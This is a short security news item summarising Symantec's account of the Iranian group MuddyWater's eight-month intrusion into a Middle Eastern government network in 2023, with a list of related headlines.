Security News > 2023 > October > Iranian hackers lurked in Middle Eastern govt network for 8 months
The Iranian hacking group tracked as MuddyWater breached at least twelve computers belonging to a Middle Eastern government network and maintained access for eight months between February and September 2023.
The attacks observed by Symantec began on February 1, 2023, and utilize a wide assortment of malware, tools, and malicious activity that lasted for 8 months.
On February 5, the attackers compromised a second computer in the network and used a masqueraded version of Plink to configure RDP access.
On September 1, the attacks compromised three more computers, using certutil to download Plink on them and run Wireshark commands on the second webserver to capture network and USB traffic packets.
Activity on the second web server continued until September 9, 2023, with the attackers executing an unknown PowerShell script and performing network shares mounting/unmounting.
'Redfly' hackers infiltrated power supplier's network for 6 months.
News URL
Related news
- Iranian hackers charged for ‘hack-and-leak’ plot to influence election (source)
- Iranian hackers now exploit Windows flaw to elevate privileges (source)
- Iranian hackers act as brokers selling critical infrastructure access (source)
- Iranian Hackers Use "Dream Job" Lures to Deploy SnailResin Malware in Aerospace Attacks (source)
- Iranian Hackers Deploy WezRat Malware in Attacks Targeting Israeli Organizations (source)